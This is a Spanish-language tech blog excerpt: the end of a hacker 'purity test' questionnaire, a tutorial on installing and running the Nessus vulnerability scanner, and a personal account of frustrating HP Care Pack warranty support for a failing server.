0036 podes convertir de EBCDIC a ASCII y viceversa?

0037 sabes cuales caracteres son iguales en ASCII y EBCDIC?

0038 sabes cual es el maxint de tu sistema?

0039 alguna vez creaste tu propio tipo numerico para tener mejor precision?

0040 podes nombrar potencias de dos arriba de 2**16 en orden arbitrario?

0041 ... arriba de 2**32?

0042 ... arriba de 2**64?

0043 podes leer una tarjeta perforada, mirando los agujeros?

0044 ... palpando los agujeros?

0045 alguna vez parchaste codigo binario?

0046 ... mientras el programa estaba corriendo?

0047 alguna vez usaste overlays en un programa?

0048 conoces a algun vice-presidente de ibm?

0049 conoces a dennis, bill o ken?

0050 alguna vez sacaste una foto a un crt?

0051 alguna vez pasaste un video en tu crt?

0052 alguna vez digitalizaste una foto?

0053 alguna vez te olvidaste de montar un scratch monkey? ---(http://en.wikipedia.org/wiki/Scratch_monkey)

0054 alguna vez optimizaste un loop idle?

0055 alguna vez optimizaste un bubble sort?

0056 tu computadora/terminal te habla?

0057 alguna vez hablaste en un modem acustico?

0058 ... te contesto?

0059 podes silbar 300 baudios?

0060 ... 1200 baudios?

0061 podes silbar un numero de telefono?

0062 has sido testigo de la destruccion de un disco?

0063 hiciste "caminar a un disco"?

0064 podes hacer un puffer train?

0065 ... sabes lo q es?

0066 podes tocar musica en tu impresora?

0067 ... en tu disco?

0068 ... en tu unidad de cinta?

0069 tenes un calendario de snoopy?

0070 esta desactualizado?

0071 tenes una foto impresa de...

0072 ... la mona lisa?

0073 ... el enterprise?

0074 ... einstein?

0075 ... oliver? --- (http://en.wikipedia.org/wiki/Oliver_Wendell_Jones)

0076 alguna vez hiciste una foto impresa?

0077 sabes lo q significa lo siguiente?

0078 ... DASD

0079 ... Emacs

0080 ... ITS

0081 ... RSTS/E

0082 ... SNA

0083 ... Spool

0084 ... TCP/IP

0085 ... alguna vez usaste TPU?

0086 ... TECO?

0087 ... Emacs?

0088 ... ed?

0089 ... vi?

0090 ... Xedit (in VM/CMS)?

0091 ... SOS?

0092 ... EDT?

0093 ... Wordstar?

0094 alguna vez escribiste en CLIST?

0095 alguna vez programaste para el sistema de ventanas X?

0096 ... CICS?

0097 alguna vez recibiste un fax o fotocopia de un floppy?

0098 alguna vez mostraste a un novato la tecla "cualquiera"? --- ("any key")

0099 ... era el boton de power?

0100 ... alguna vez asististe a Usenix?

0101 ... DECUS?

0102 ... SHARE?

0103 ... SIGGRAPH?

0104 ... NetCon?

0105 alguna vez participaste en un grupo de standards?

0106 alguna vez debuggeaste codigo maquina a traves del telefono?

0107 alguna vez viste el voice mail?

0108 ... pudiste leerlo?

0109 resolviste puzzles de palabras con un diccionario on-line?

0110 alguna vez hiciste el test de Turing? --- (http://en.wikipedia.org/wiki/Turing_test)

0111 ... fallaste?

0112 alguna vez dejaste caer un deck de tarjetas perforadas?

0113 ... pudiste volver a ordenarlo con exito?

0114 ... sin mirar?

0115 alguna vez usaste IPCS?

0116 alguna vez recibiste una caja de cerveza con tu computadora?

0117 tu computadora vino en colores de "diseñador"?

0118 alguna vez interrumpiste una UPS?

0119 alguna vez enmascaraste un NMI?

0120 alguna vez apagaste un sistema Halon?

0121 ... intencionalmente?

0122 ... todavia trabajas ahi?

0123 alguna vez presionaste el boton de power de emergencia?

0124 ... intencionalmente?

0125 tenes documentacion vieja?

0126 ... todavia la lees?

0127 alguna vez hiciste ingenieria inversa o decompilaste un programa?

0128 ... encontraste bugs en el?

0129 siempre ayudas a la persona detras del mostrador con su terminal/computadora?

0130 trataste de montar en un rack tu telefono?

0131 alguna vez lanzaste una computadora de mas de dos pisos de altura?

0132 alguna vez parchaste un bug que el vendedor no reconocio?

0133 alguna vez arreglaste un problema de harware mediante software?

0134 ... viceversa?

0135 perteneciste a algun grupo de soporte a usuarios?

0136 fuiste mencionado alguna vez en "Computer Recreations"?

0137 fueron mencionadas alguna vez tus actividades en el diario?

0138 ... te saliste con la tuya?

0139 alguna vez ajustaste un freno de tambor mientras el tambor giraba? ---(http://es.wikipedia.org/wiki/Memoria_de_tambor)

0140 alguna vez escribiste comentarios en un idioma q no es el tuyo?

0141 destruiste equipo x medio de software?

0142 trataste de mejorar tu puntuacion en este test?

0143 llevas listados cuando vas a comer?

0144 ... a la cama?

0145 alguna vez parchaste un bug de microcodigo?

0146 ... evitaste uno?

0147 podes programar una maquina Turing?

0148 podes convertir de postfix a prefix mentalmente?

0149 podes convertir de hexa a octal mentalmente?

0150 sabes como usar una estrella Kleene?

0151 te moriste de hambre comiendo con filosofos? --- (http://es.wikipedia.org/wiki/Problema_de_la_cena_de_los_fil%C3%B3sofos)

0152 resolviste el problema de la parada? --- (Turing)

0153 ... correctamente?

0154 arreglaste deadlocks mientras comias spaghetti? ... (http://es.wikipedia.org/wiki/Problema_de_la_cena_de_los_fil%C3%B3sofos)

0155 alguna vez escribiste un programa q se auto-reproduzca?

0156 cambiaste el cambiador?

0157 podes leer un diagrama de flujo?

0158 ... necesitas uno?

0159 creaste un programa q no se pueda matar?

0160 ... intencionalmente?

0161 alguna vez te pidieron una cookie?

0162 alguna vez aceleraste un sistema removiendo un jumper?

*sabes?

0163 sabes quien escribio Rogue?

0164 ... Rogomatic?

0165 sabes codigo Gray?

0166 sabes lo q significa HCF?

0167 ... lo usaste?

0168 ... intencionalmente?

0169 sabes lo q es una tarjeta perforada?

0170 ... alguna vez hiciste una?

0171 sabes cual es el fin de un epoch?

0172 ... celebraste uno alguna vez?

0173 ... tuviste q reescribir codigo?

0174 conoces la diferencia entre DTE y DCE?

0175 sabes el pinout de un RS-232C?

0176 ... podes cablear un conector sin mirar?

*tenes?

0177 tenes una copia de Dec Wars?

0178 tenes la "Canonical Collection of Lightbulb Jokes"?

0179 tenes una copia del "Diccionario del Hacker"?

0180 ... contribuiste en el?

0181 tenes una regla para diagramas de flujo?

0182 ... esta sin usar?

0183 tenes tu propia version de "fortune-cookie"?

0184 tenes el "Anarchist's Cookbook"?

0185 alguna vez hiciste algo de ahi?

0186 tenes un modem?

0187 ... una terminal?

0188 ... una computadora de juguete?

0189 ... una computadora personal?

0190 ... una mini computadora?

0191 ... un mainframe?

0192 ... una supercomputadora?

0193 ... una hypercube?

0194 ... una impresora?

0195 ... una impresora laser?

0196 ... una unidad de cinta?

0197 ... un periferico pasado de moda?

0198 tenes una calculadora programable?

0199 ... es RPN?

0200 alguna vez tuviste mas de una computadora?

0201 ... 4 computadoras?

0202 ... 16 computadoras?

0203 tenes una linea SLIP?

0204 una linea T1?

0205 tenes una linea telefonica separada para tu terminal/computadora?

0206 ... es legal?

0207 tenes memoria de nucleos magneticos?

0208 ... drums de almacenamiento?

0209 ... memoria de burbuja?

0210 usas mas de 16 megabytes de espacio en disco?

0211 ... 256 megabytes?

0212 ... 1 gigabyte?

0213 ... 16 gigabytes?

0214 ... 256 gigabytes?

0215 ... 1 terabyte?

0216 tenes un drive optico?

0217 tenes una libreria personal en cinta magnetica?

0218 ... esta sin etiquetar?

0219 tenes mas de 16 floppy disks?

0220 ... 64 floppy disks?

0221 ... 256 floppy disks?

0222 ... 1024 floppy disks?

0223 tenes discos de 8 pulgadas?

0224 tenes un internal stack?

0225 tenes una interrupcion de reloj?

0226 tenes los volumente 1 a 3 de _The Art of Computer Programing_? --- (Donald Knuth)

0227 ... hiciste todos los ejercicios?

0228 ... tenes un simulador MIX?

0229 ... podes nombrar los volumenes no escritos?

0230 podes citar algo de "_The Mythical Man-month_? --- (Fred Brooks)

0231 participaste en el proyecto OS/360?

0232 tenes un handbook TTL?

0233 tenes impresiones de mas de tres años?

*profesion

0234 tenes trabajo?

0235 ... alguna vez tuviste trabajo?

0236 ... relacionado con las computadoras?

0237 trabajas en horarios irregulares?

0238 alguna vez fuiste administrador de sistema?

0239 tenes mas megabytes q megadolares?

0240 hiciste downgrade a tu trabajo para hacer upgrade a tu poder de procesamiento?

0241 es seguro tu trabajo?

0242 ... tenes codigo para probarlo?

0243 tuviste una autorizacion de seguridad?

*juegos

0244 alguna vez jugaste Pong?

0245 ... Adventure?

0246 ... Spacewar?

0247 ... Star Trek?

0248 ... Wumpus?

0249 ... Lunar Lander?

0250 ... Empire?

0251 ... alguna vez terminaste Moria 4.8?

0252 ... Rogue 3.6?

0253 ... Rogue 5.3?

0254 ... Larn?

0255 ... Hack 1.0.3?

0256 ... Nethack 2.4?

0257 podes hacer una mejor puntuacion en Rogue q Rogomatic?

0258 resolviste Adventure?

0259 ... Zork?

0260 escribiste alguna vez un redcode?

0261 escribiste un programa de aventura?

0262 ... un juego en tiempo real?

0263 ... un multijugador?

0264 ... uno en red?

0265 podes psicoanalizar a Eliza? --- (http://en.wikipedia.org/wiki/ELIZA)

*Hardware

0266 alguna vez usaste un lapiz optico?

0267 ... lo construiste?

0268 alguna vez usaste un teletipo?

0269 ... cinta de papel?

0270 ... un decwriter?

0271 ... un lector/perforador de tarjetas?

0272 ... un SOL?

0273 alguna vez armaste un Altair?

0274 ... una computadora Heath/Zenith?

0275 sabes usar un osciloscopio?

0276 ... un voltimetro?

0277 ... un frecuencimetro?

0278 ... una sonda logica?

0279 ... una herramienta para wirewrap?

0280 ... un soldador?

0281 ... un analizador logico?

0282 alguna vez diseñaste un chip LSI?

0283 ... fue fabricado?

0284 hiciste un circuito impreso?

*historico

0285 conmutaste en codigo de boot sobre el panel frontal?

0286 ... desde memoria?

0287 podes programar una Eniac?

0288 viste una tarjeta de 90 columnas?

*IBM

0289 recitas part numbers de IBM mientras dormis?

0290 sabes lo q es el part number 7320154?

0291 entendes flujos de datos 3270?

0292 sabes lo q son las clases de privilegios VM?

0293 hiciste IPLed en una IBM fuera del cartucho de cinta?

0294 ... fuera de un lector de tarjetas?

0295 podes cantar algo del "IBM Songbook"?

*lenguajes

0296 sabes mas de 4 lenguajes de programacion?

0297 ... 8 lenguajes?

0298 ... 16 lenguajes?

0299 ... 32 lenguajes?

0300 alguna vez diseñaste un lenguaje?

0301 sabes lo q es el Basic?

0302 ... Pascal?

0303 podes programar en basic?

0304 ... lo admitis?

0305 podes programar en Cobol?

0306 ... lo negas?

0307 sabes Pascal?

0308 ... Modula-2?

0309 ... Oberon?

0310 ... mas de dos lenguajes de Wirth?

0311 ... podes contar un chiste de Niklaus Wirth?

0312 sabes Algol-60?

0313 ... Algol-W?

0314 ... Algol-68?

0315 entendes el reporte Algol-68?

0316 te gusta la gramatica de dos niveles? --- (http://en.wikipedia.org/wiki/Van_Wijngaarden_grammar)

0317 podes programar en assembler para 2 maquinas distintas?

0318 ... en 4 maquinas distintas?

0319 ... en 8 maquinas distintas?

0320 sabes APL?

0321 ... Ada?

0322 ... BCPL?

0323 ... C++?

0324 ... C?

0325 ... Comal?

0326 ... Eiffel?

0327 ... Forth?

0328 ... Fortran?

0329 ... Hypertalk?

0330 ... Icon?

0331 ... Lisp?

0332 ... Logo?

0333 ... MIIS?

0334 ... MUMPS?

0335 ... PL/I?

0336 ... Pilot?

0337 ... Plato?

0338 ... Prolog?

0339 ... RPG?

0340 ... Rexx (or ARexx)?

0341 ... SETL?

0342 ... Smalltalk?

0343 ... Snobol?

0344 ... VHDL?

0345 ... cualquier assembler?

0346 podes hablar VT-100?

0347 ... Postscript?

0348 ... SMTP?

0349 ... UUCP?

0350 ... English?

*micros

0351 alguna vez copiaste un disco con proteccion de copia?

0352 creaste un esquema de proteccion de copia?

0353 hiciste un disco "flippy"?

0354 alguna vez recuperaste datos desde un disco dañado?

0355 booteaste con un floppy sin la cubierta?

*redes

0356 alguna vez te logueaste en dos diferentes zonas horarias a la vez?

0357 memorizaste el mapa UUCP de tu pais?

0358 ... de todos los paises?

0359 encontraste un bug en sendmail?

0360 ... era un agujero de seguridad?

0361 memorizaste la tabla del archivo HOSTS.TXT?

0362 ... estas al dia?

0363 podes nombrar todos los nameservers de nivel superior y sus direcciones?

0364 te sabes el RFC-822 de memoria?

0365 ... podes nombrar todos los errores en el?

0366 escribiste un archivo de configuracion de Sendmail?

0367 ... funciono?

0368 murmuras "defocus" mientras dormis?

0369 conoces el maximo tiempo de vida de un paquete?

*sistemas operativos

0370 sabes usar BSD Unix?

0371 ... non-BSD Unix?

0372 ... AIX

0373 ... VM/CMS?

0374 ... VMS?

0375 ... MVS?

0376 ... VSE?

0377 ... RSTS/E?

0378 ... CP/M?

0379 ... COS?

0380 ... NOS?

0381 ... CP-67?

0382 ... RT-11?

0383 ... MS-DOS?

0384 ... Finder?

0385 ... PRODOS?

0386 ... mas de un sistema para el TRS-80?

0387 ... Tops-10?

0388 ... Tops-20?

0389 ... OS-9?

0390 ... OS/2?

0391 ... AOS/VS?

0392 ... Multics?

0393 ... ITS?

0394 ... Vulcan?

0395 alguna vez paginaste o cambiaste una unidad de cinta?

0396 ... una lectora/perforadora de tarjetas?

0397 ... un teletipo?

0398 ... un disco de red?

0399 encontraste algun bug en un sistema operativo?

0400 ... lo explotaste?

0401 ... lo reportaste?

0402 fue ignorado tu reporte?

0403 alguna vez colgaste un sistema?

0404 ... intencionalmente?

*gente

0405 conoces a alguien?

0406 ... mas de una persona?

0407 ... mas de dos?

*personal

0408 ... estan tus cordones desatados?

0409 te relacionas bien con extraños?

0410 sos capaz de nombrar los numeros telefonicos de media docena de sistemas de computadoras pero incapaz de recordar el tuyo?

0411 te logueas despues del desayuno?

0412 consumis mas de la mitad de la dosis letal de cafeina por dia?

0413 contestas las preguntas de "esto" o "lo otro" con "si"?

0414 tenes una copia actualizada del manual de varios sistemas operativos?

0415 ... *todos* los sistemas operativos?

0416 otras personas tienen dificultad usando tu entorno personalizado?

0417 soñas en algun lenguaje de programacion?

0418 tenes dificultad enfocando objetos tridimensionales?

0419 ignoras el mouse?

0420 desprecias la tecla CAPS LOCK?

0421 crees q los menus pertenecen a los restaurants?

0422 tenes un Mandelbrot colgando en la pared?

0423 alguna vez decoraste con cinta magnetica o tarjetas perforadas?

0424 tenes un plato de disco o un floppy desarmado colgando en tu casa?

0425 alguna vez viste el amanecer?

0426 dos veces seguidas?

0427 usas la palabra "foobar" en una conversacion normal?

0428 ... "bletch"?

0429 usas la "P convention"?

0430 respondes automaticamente a cualquier pregunta de usuario con RTFM?

0431 ... sabes lo q significa?

0432 pensas q recoleccion de basura significa manejo de memoria?

0433 tenes problemas con el espacio horizontal en tu oficina/habitacion?

0434 lees "Scientific American" en bares para levantarte mujeres?

0435 tu patente esta relacionada con computadoras?

0436 hiciste el Purity Test?

0437 alguna vez tuviste una experiencia fuera de la CPU?

0438 hiciste una cita a ciegas a traves de la computadora?

0439 hablas con la persona al lado tuyo via computadora?

*programacion

0440 podes escribir un compilador de Fortran?

0441 ... en TECO?

0442 podes leer un dump?

0443 podes desensamblar codigo mentalmente?

0444 alguna vez escribiste un compilador?

0445 ... un sistema operativo?

0446 ... un driver?

0447 ... un procesador de texto?

0448 ... un display hack?

0449 ... un sistema de base de datos?

0450 ... un sistema experto?

0451 ... un edge detector?

0452 ... un sistema de control en tiempo real?

0453 ... un paquete de contabilidad?

0454 ... un virus?

0455 ... un profilactico? --- (virus)

0456 alguna vez escribiste un programa de biorritmo?

0457 ... vendiste los resultados?

0458 ... eran arbitrariamente inventados?

0459 alguna vez calculaste el valor de pi a mas de mil decimales?

0460 ... el numero e?

0461 podes encontrar un numero primo de mas de 100 digitos?

0462 escribiste codigo auto-modificable?

0463 ... estas orgulloso de ello?

0464 alguna vez escribiste un programa q corra sin problemas a la 1era vez?

0465 ... tenia mas de 20 lineas?

0466 ... 100 lineas?

0467 ... estaba en assembler?

0468 ... funciono la 2da vez?

0469 podes resolver las Torres de Hanoi recursivamente?

0470 ... no-recursivamente?

0471 ... usando el formateador de texto Troff?

0472 alguna vez mandaste algo al concurso de codigo C ofuscado?

0473 ... gano?

0474 ... inspiro una nueva regla?

0475 conoces el dispositivo de Duff?

0476 conoces el dispositivo de Jensen?

0477 alguna vez pasaste diez minutos tratando de encontrar un error de un solo caracter?

0478 ... mas de una hora?

0479 ... mas de un dia?

0480 ... mas de una semana?

0481 la 1er persona a la q se lo mostraste lo encontro inmediatamente?

*Unix

0482 podes usar Berkeley Unix?

0483 ... Unix No-Berkley?

0484 podes distinguir entre las secciones 4 y 5 del manual de Unix?

0485 podes encontrar TERMIO en la documentacion de System V release2?

0486 alguna vez montaste un cartucho como sistema de archivos Unix?

0487 alguna vez compilaste Minix?

0488 podes contestar correctamente "quiz function ed-command"?

0489 ... q tal "quiz ed-command function"

*Usenet

0490 lees noticias?

0491 ... mas de 32 grupos de noticias?

0492 ... mas de 256 grupos de noticias?

0493 ... todos los grupos de noticias?

0494 alguna vez posteaste un articulo?

0495 ... posteas regularmente?

0496 alguna vez posteaste un flame?

0497 ... alguna vez flameaste un cross-posting?

0498 ... siempre flameas un flame?

0499 ... flameas regularmente?

0500 posteaste algun programa en un grupo de sources?

0501 forjaste un posteo?

0502 alguna vez formaste un nuevo grupo de noticias?

0503 ... todavia existe?

0504 te acordas de mod.ber?

0506 ... the Stupid People's Court?

0507 ... Bandy-grams?

*preaking

0508 alguna vez armaste una black box?

0509 podrias nombrar todos los colores de boxes?

0510 ... y sus funciones asociadas?

0511 tiene tu telefono 16 botones DTMF?

0512 la ruptura de MaBell te crea mas oportunidades? --- (http://en.wikipedia.org/wiki/Bell_System_divestiture)

un clasico... Nessus (Scanner de vulnerabilidades).

2011-04-01T14:04:00.031-03:00

nessus es un scanner de vulnerabilidades muy utilizado tanto x administradores de red como hackers... lo mejor para evitar un ataque es usar las mismas tecnicas q el atacante. la diferencia entre un simple scanner de puertos y uno de vulnerabilidades es q el 1ero simplemente trata de conectar a puertos abiertos en el objetivo mientras q en el 2do esa es solamente la 1era parte del trabajo.

lo q hace nessus (y similares) es comenzar con un scanneo de puertos y despues en base a los resultados prueba una serie de exploits q almacena en su base de datos, estos "tests de vulnerabilidad" estan escritos en NASL (Nessus Attack Scripting Language) q es un lenguaje de scripting propio del sistema. esta base de datos es actualizable siempre y cuando registremos el software ya que hace unos años nessus dejo de ser gpl para pasar a tener licencia comercial aunque se puede registrar gratuitamente para uso hogareño.

nessus esta disponible en versiones para linux, windows, OS X, freebsd y solaris y se puede descargar desde aca despues de aceptar la licencia:

http://www.nessus.org/download/

instalacion y registro...

elegimos el paquete correspondiente a nuestro sistema y procedemos a instalarlo, en mi caso con dpkg:

dpkg -i Nessus-4.4.1-debian5_i386.deb

si fuera redhat/suse:

rpm -ivh Nessus.....rpm

y en windows... bue... click, next... como siempre ;)

en versiones anteriores nessus constaba de la parte server (la q hace el scanneo) y el cliente q se conectaba a este para indicarle lo q debe hacer. en esta version el cliente corre directamente desde cualquier browser asi q ya terminamos con la instalacion, solo hay q configurar un par de cosas para empezar a usarlo.

a continuacion creamos un user para loguear en el server, el directorio de instalacion x default es /opt/nessus/ asi que ponemos:

/opt/nessus/sbin/nessus-adduser

lo q nos devuelve en pantalla:

Login : username

Login password :

Login password (again) :

Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y

User rules

----------

nessusd has a rules system which allows you to restrict the hosts

that username has the right to test. For instance, you may want

him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :

(the user can have an empty rules set)

Login : username

Password : ***********

This user will have 'admin' privileges within the Nessus server

Rules :

Is that ok ? (y/n) [y] y

User added

1ero nos pide el usuario, despues password y confirmacion y si queremos darle al user derechos de admin. a continuacion podemos definir un set de reglas para el usuario, lo dejamos en blanco presionando enter y finalmente nos muestra los datos de la cuenta y pide confirmacion. con el tema de las reglas se pueden restringir usuarios a ciertos rangos de ip x ejemplo, en el manual del comando se puede encontrar mas info sobre esto.

antes de arrancar el proceso lo mejor es registrarnos en la pagina:

http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

elegimos "using nessus at home" y seguimos los pasos poniendo una direccion de correo valida ya q ahi nos envian la key de registro. una vez q la tenemos procedemos a registrarlo:

locutus:/# /opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX

Your activation code has been registered properly - thank you.

Now fetching the newest plugin set from plugins.nessus.org...

se va a pasar asi un rato hasta actualizar la base de plugins asi q tengan paciencia y no corten el proceso hasta q termine. si no me hacen caso y lo cortan o pasa algo se puede actualizar haciendo:

/opt/nessus/sbin/nessus-update-plugins

no me acuerdo si despues lanza solo el daemon pero en todo caso lo arrancamos como cualquier otro:

/etc/init.d/nessusd start

scanneando...

una vez q el server esta instalado y corriendo solo queda abrir un navegador y poner:

https://localhost:8834/

esperamos q cargue y nos muestra la pantalla de logueo:

lo 1ero es crear una politica de scanneo, vamos a "policies" y hacemos click en "add":

en el siguiente menu especificamos los detalles del scanneo q vamos a correr, es recomendable mirar bien todo segun el caso si se quiere hacer algo mas dirigido y rapido, pero tambien pueden dejar todo x default y hacer el scanneo completo. se pueden cargar credenciales (win, ssh, kerberos, etc) si tienen alguna y elegir los plugins y las preferencias de cada uno.

ahora ya podemos empezar el scaneo, vamos a "scans" y "add" y completamos los datos:

un nombre para el scan, en policy elegimos la politica q recien creamos y en scan target el objetivo(s), click en "launch scan" y ya esta corriendo:

si hacemos click en el nombre del host y despues en "browse" podemos ver el progreso y al finalizar en reports vemos el reporte completo:

y haciendo click en cada uno de los puertos se visualizan las vulnerabilidades encontradas junto con una descripcion del problema y la forma de parcharlo (o explotarlo) si esta disponible.

HP Care? Packs al descubierto

2011-03-10T16:52:00.010-03:00

todo comenzo a finales de 2009, cambie de trabajo y una de mis primeras tareas era instalar un nuevo server de correo ya q el anterior era practicamente prehistorico, asi q me puse a buscar algo acorde con el sXXI. como anteriormente me habia manejado mucho con HP y nunca habia tenido problemas no dude en buscar algo de esa marca, el DL160 G6 me parecio bastante (y hasta demasiado) para lo q necesitaba asi q pedi presupuestos, aca se pueden ver las especificaciones del equipo:

http://h10010.www1.hp.com/wwpc/us/en/sm/WF06a/15351-15351-3328412-241644-3328421-3884343.html

lo pedi con un micro E5504, 8gb de memoria y 1Tb de disco. junto con uno de los presupuestos me ofrecen el famoso "Care Pack" de HP... y aca empieza la verdadera historia.

Care? Pack

el CarePack es simplemente una garantia extendida, se puede sacar para cualquier cosa, un desktop, laptop, hasta para una pocket... y x supuesto para servidores q es lo mas critico y donde esta el mayor negocio. las empresas no dudan en pagar el carepack con tal de tener un servicio rapido q no deje demasiado tiempo down sus servers.

en mis anteriores experiencias con HP trabajaba para empresas grandes con muchos "care packs" y la verdad q el servicio era bastante bueno. lo peor que me llego a pasar creo q fue una vez q se prendio fuego el backplane de un DL360 y al otro dia ya lo tenia andando. lo triste es q crei q el servicio era igual para todos, no q habia uno para los q tienen cientos de contratos y otro muy distinto para el q solo tiene uno... je

continuando... con el DL160 me ofrecen:

Next Business Day On-site Service, 5-Day x 9-Hour Coverage, 3 Years U$S 228 + IVA (iva=21%)

mmmm... no es tan caro, ofrecen servicio on-site al otro dia de la incidencia 5x9, 3 años... sin esta extension la garantia es x 3 años y cubre soporte remoto y partes solamente... me cierra, compro.

instalando...

finalmente en noviembre tengo el server en mis manos con el correspondiente carepack, q segun la pagina de HP consiste en lo siguiente:

Respuesta en el sitio al día hábil siguiente: En el caso de problemas que no se pueden resolver en forma remota, un representante autorizado de Servicios HP visita el sitio al día siguiente de una llamada que cae dentro de una ventana de servicio contratada registrada. Servicios HP restaura el hardware cubierto a su condición operativa, reparando o reemplazando componentes o la unidad completa, si fuera necesario. La cobertura incluye todas las partes y los materiales requeridos.

si fuera tan facil...

el 1er "problema", q no era tan problema (o no lo parecia), era q tenia q usar todos sistemas libres ya q nadie queria pagar licencias. obvio linux y como venia todo en esa linea y preferi la estabilidad le meti con CentOS. cambie algunas cosas asi q estuve un buen rato configurando y migrando, postfix x sendmail, dovecot x courier, spamassassin, mailman, etc. y para dar el toque final cambie el prehistorico (pero muy solido) squirrel x el moderno roundcube... muy solido tambien, nunca un problema, lo recomiendo.

migro todo, cuentas, correos, cambio dns y lo pongo online. mas alla de los "pequeños detalles" q siempre puede haber en algo asi, queda todo funcionando ok y a la semana se podria decir q todo corre estable y sin carga casi para el server dado el poco trabajo q hacia.

asi estuvo todo unos 4 meses hasta q en abril un dia se cae... pero se cae raro, no carga el apache, no responden pop y smtp aunque si el ping, x ssh pide login y despues queda colgado. como trabajo remoto casi todo el tiempo me tengo q ir hasta el server fisicamente (casi 1hr de viaje), y lo encuentro con un lindo led frontal parpadeando en rojo...

health led

una luz roja nunca es buenas noticias, voy al manual y encuentro q el led es el correspondiente al "health" (salud) del equipo. no responde tampoco localmente y no me queda otra q reiniciarlo, le doy al boton y... no se apaga... fuck! no me quedo otra q sacarle la corriente. arranca y todo normal, como si nunca hubiera pasado nada.

pruebo todo, miro logs... nada, simplemente en 1 momento le agarro un ataque y entro en coma. lo tomo como una falla aleatoria y rezo para q no vuelva a pasar pero a los dos dias mas o menos otra vez lo mismo, vuelvo a checkear todo y agrego temperaturas, memoria, disco... todo parece ok.

mientras tanto agarro otra vez el manual para ver q me quiere decir el maldito "health led" y me encuentro con esto:

y si, un led de "salud" en rojo es un error critico. como todo apunta al hard me meto en la web de HP, cargo el equipo con su correspondiente carepack, abro un caso y empieza el paseo. me piden un pequeño checkeo:

#hpasmcli

hpasmcli> show dimm

hpasmcli> show fans

hpasmcli> show iml

hpasmcli> show powersupply

hpasmcli> show server

hpasmcli> show temp

hpasmcli> exit

subir resultados a un FTP junto con logs del sistema... todo muy lindo, salvo q me contesta esto:

- Diagnóstico del problema:

El servidor por parte del hardware no presenta ningún incidente, sin embargo la causa del bloqueo se debe a que el daemon "gconf" el cual almacena las opciones de la configuración del entorno gráfico y de los distintos programas se apaga:

May 1 22:11:25 mail gconfd (root-1296): GConf server is not in use, shutting down.

May 1 22:11:25 mail gconfd (root-1296): Exiting

May 1 22:11:28 mail gconfd (root-1337): starting (version 2.14.0), pid 1337 user 'root'

May 1 22:11:28 mail gconfd (root-1337): Resolved address "xml:readonly:/etc/gconf/gconf.xml.mandatory" to a read-only configuration source at position 0

May 1 22:11:28 mail gconfd (root-1337): Resolved address "xml:readwrite:/root/.gconf" to a writable configuration source at position 1

May 1 22:11:28 mail gconfd (root-1337): Resolved address "xml:readonly:/etc/gconf/gconf.xml.defaults" to a read-only configuration source at position 2

May 3 07:05:47 mail syslogd 1.4.1: restart.

Lo anterior debido a que es probable que la interfaz gráfica (X Window System o X) esté presentando un conflicto el cual lo provoca:

Apr 29 12:18:15 mail gdm[3596]: gdm_slave_xioerror_handler: Fatal X error - Restarting :0

y me cierra el caso... xD

ese error es por abrir alguna aplicacion grafica x ssh y cerrarla mal, se q no deberia hacerlo pero es obvio q no tiene nada q ver con una luz roja ni con nada, ni siquiera es un error en realidad. ok, saco el servidor grafico a ver q me decis ahora...

queda corriendo en consola y a los 2 dias se vuelve a caer, abro otro caso y me hacen bajar el famoso "easy setup cd" donde esta el insight diagnostics q es un software de testeo de hardware de HP, checkeo todo como me dice, le mando los resultados (todo ok) y me recomienda... upgrade de firmware!! la manera mas rapida de sacarse de encima a alguien cuando no se tiene idea de q pasa.

hago el upgrade y a los 10 minutos ya tengo al tipo preguntandome si esta todo ok y q si puede cerrar el caso. lo mantengo hasta el otro dia q me llama al mediodia, le pido q lo deje abierto un tiempo mas y me vuelve a llamar a las 6 de la tarde cuando le digo q lo cierre si quiere (y q me deje de joder!). pareciera q lo unico q les interesa es "cerrar el caso", q sentido tiene si la falla aparece cada 48hs o mas?

linux=lepra

a todo esto cuando se dieron cuenta q corria centos me trataron como si tuviera lepra, enseguida aclararon q no se hacian cargo de ese sistema y me mandaron a los foros de centos. xq problema de hardware segun ellos no era... raro, el manual dice q si pero los tecnicos dicen q no...

en realidad la hicieron facil, si queres soporte pagate un win o la suscripcion a redhat (q es lo mismo q centos) y recien despues de q veamos q no hay problema en el sistema podemos decir q es hardware y empezar a ver q es. en resumen... arreglatelas solo x usar linux.

y el "next day coverage"?... bien, gracias.

me canse de recorrer foros preguntando y ni los mas "gurus" tenian idea si no era hard, se tejieron teorias descabelladas, llegue a hacer cosas q ni tenia idea q existian (eso lo agradezco) y sobre todo perdi mucho tiempo... meses.

cuando me aburri de hacer pruebas y cambiar cosas sin ningun resultado decidi migrar los servicios a otro equipo exactamente igual comprado justo antes de este problema (sin carepack), y en el cual corren los servicios hasta hoy en la misma configuracion exacta sin un solo problema jamas. con el tema de las caidas del correo solucionado tenia el server libre para probar lo q quisiera sin tener q dejar sin servicio a nadie.

lo 1ero q hago es bajar todo lo q puedo y se sigue colgando, lo formateo y reinstalo desde 0 y se sigue colgando, health led en rojo, etc... a todo esto pasan meses dado q hay q esperar la falla para ver si los cambios surten efecto, no es tan simple como cambiar algo y probar...

"next day coverage"... ja. ok, le pongo win server a ver si me hacen caso o tal vez "milagrosamente" se arregle x el poder de billy... no se rian, windows no es taaaaaan malo como dicen ;)

con 2003 server x64 al principio anda bien pero a las 2 semanas se empieza a reiniciar, en lugar de cuelgue y led en rojo reinicio. lo dejo unos meses mas... le meto maquinas virtuales, lo hago trabajar, q se reinicie, q haga lo q quiera... q se queme, hasta q no pase eso no se van a hacer cargo.

en diciembre empieza a aparecer el led rojo otra vez y igual q antes no se puede reiniciar sin sacar la corriente... ya no le quedaba mucho... xD

uncorrectable error

un dia, como tenia q ser, no volvio a prender. despues de reiniciarla me tira en pantalla:

PCI Express Uncorrectable Error

System Halted

no ve el disco en el setup, como consecuencia no carga sistema... ya esta, algo se rompio, ahora no me vengan con boludeces...

abro caso explicando todo con detalle, incluyendo los numeros de los casos anteriores de hace meses. me responden lo siguiente:

1. El OS puede ser que no cargue dado que se cargaron Defaults y si tiene algún RAID no fue configurado de vuelta.

Tendría que configurarlo de vuelta.

2. Necesitamos por favor realizar actualizaciones de Firmware en el servidor:

http://h20000.www2.hp.com/bizsupport/TechSupport/xxxxxx

